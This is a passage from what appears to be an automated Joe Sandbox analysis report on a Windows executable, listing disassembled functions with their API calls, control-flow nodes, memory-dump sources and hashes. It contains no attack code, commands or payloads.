                                          • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                          • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                          • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89
                                          Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000010,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                          • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID: ExecuteFile
                                          • API String ID: 1033339047-323923146
                                          • Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                          • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                          • Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                          • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D
                                          Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                          • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@memmove
                                          • String ID:
                                          • API String ID: 3828600508-0
                                          • Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                          • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                          • Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                          • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                          Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                          • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                          • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                          • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                          Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                            • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                            • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                            • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$??2@ExceptionThrowmemmove
                                          • String ID:
                                          • API String ID: 4269121280-0
                                          • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                          • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                          • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                          • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                          Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@H_prolog
                                          • String ID:
                                          • API String ID: 1329742358-0
                                          • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                          • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                          • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                          • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                          Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                                          • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                          • Opcode Fuzzy Hash: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                                          • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                          Function 004022B0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                          • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                                          • Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                          • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                                          Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                          • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                          • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                          • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                          Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                          • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AllocExceptionStringThrow
                                          • String ID:
                                          • API String ID: 3773818493-0
                                          • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                          • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                          • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                          • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                          Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3168844106-0
                                          • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                          • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                          • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                          • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                          Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                          • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                          • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                          • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                          Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                          • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                          • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                          • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                          Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: CloseCreateFileHandle
                                          • String ID:
                                          • API String ID: 3498533004-0
                                          • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                          • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                          • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                          • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                          Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                          • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                          • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                          • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                          Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • _beginthreadex.MSVCRT ref: 00406552
                                            • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast_beginthreadex
                                          • String ID:
                                          • API String ID: 4034172046-0
                                          • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                          • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                          • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                          • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                          Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                          • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                          • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                          • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                          Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
